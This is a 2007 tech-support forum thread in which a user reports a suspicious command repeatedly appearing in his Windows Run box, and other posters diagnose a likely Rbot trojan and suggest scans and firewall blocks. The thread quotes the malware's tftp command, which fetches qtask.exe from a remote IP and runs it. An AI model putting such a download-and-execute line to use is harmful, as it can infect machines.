Velocity Reviews - Computer Hardware Reviews

Velocity Reviews > Newsgroups > Computing > Computer Support > Run command showing a tftp command on it's own

Reply
Thread Tools

Run command showing a tftp command on it's own

 
 
kvine@marchnetworks.com
Guest
Posts: n/a
 
      01-12-2007
Hi

About 5 times yesterday this would show up in my Run command while it
was working. I have no idea why and doing a virus and adaware scan
does not fix it. I do not have Quicken installed on my PC.

tftp -i 216.104.106.132 get qtask.exe& start qtask.exe& exit

I just want to get rid of it so what else can I try?

Thanks
Ken

 
Reply With Quote
 
 
 
 
Beauregard T. Shagnasty
Guest
Posts: n/a
 
      01-12-2007
http://www.velocityreviews.com/forums/(E-Mail Removed) wrote:

> About 5 times yesterday this would show up in my Run command while it
> was working. I have no idea why and doing a virus and adaware scan
> does not fix it. I do not have Quicken installed on my PC.
>
> tftp -i 216.104.106.132 get qtask.exe& start qtask.exe& exit
>
> I just want to get rid of it so what else can I try?


Maybe you are infected with this:
http://www.sophos.com/security/analyses/w32rbotaku.html
...which says it uses the filename qtask.exe

Or maybe you have some other trojan that is trying to download it.
Try the first three (free) anti-spyware programs listed here:
http://k75s.home.att.net/tips.html#spyware

--
-bts
-Motorcycles defy gravity; cars just suck
 
Reply With Quote
 
 
 
 
why?
Guest
Posts: n/a
 
      01-12-2007

On 12 Jan 2007 05:34:19 -0800, (E-Mail Removed) wrote:

>Hi
>
>About 5 times yesterday this would show up in my Run command while it
>was working. I have no idea why and doing a virus and adaware scan
>does not fix it. I do not have Quicken installed on my PC.


So then tell your firewall to

a) block tftp.exe or .com as an app
b) block the IP address
c) block the (default) port
http://www.iana.org/assignments/port-numbers
tftp 69/tcp Trivial File Transfer
tftp 69/udp Trivial File Transfer

>tftp -i 216.104.106.132 get qtask.exe& start qtask.exe& exit


Output from ARIN WHOIS
ARIN Home Page ARIN Site Map ARIN WHOIS Help Tutorial on Querying
ARIN's WHOIS
Search for :
Search results for: 216.104.106.132

OrgName: Cyber Beach Communications
OrgID: CBCH
Address: 500 Barrydowne Rd
City: Sudbury
StateProv: ON
PostalCode: P3A-5W1
Country: CA

Ask them?

>I just want to get rid of it so what else can I try?


d) rename tftp.exe / .com
e) delete it (c)

>Thanks
>Ken


Fairly simple.

Me
 
Reply With Quote
 
 
 
Reply

Thread Tools

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off
Trackbacks are On
Pingbacks are On
Refbacks are Off


Similar Threads
Thread Thread Starter Forum Replies Last Post
Sh Crypto isakmp sa is showing Active but Tunnel is showing line protocol down. urvin Cisco 0 04-15-2008 08:17 AM
how to run os.execv() to run command pslq dbname < gen.command Sonu Python 2 08-04-2007 11:25 PM
booting router from tftp: image is stored within a sub-dir in tftp root Sharad Cisco 0 02-13-2007 11:31 AM
ASP 1.1: DataGrid - Showing/Not Showing Buttons Ray Booysen ASP .Net 2 03-28-2006 02:49 PM
tftp-server flash:config.txt Command help needed z400d3 Cisco 0 01-21-2005 03:09 PM



Advertisments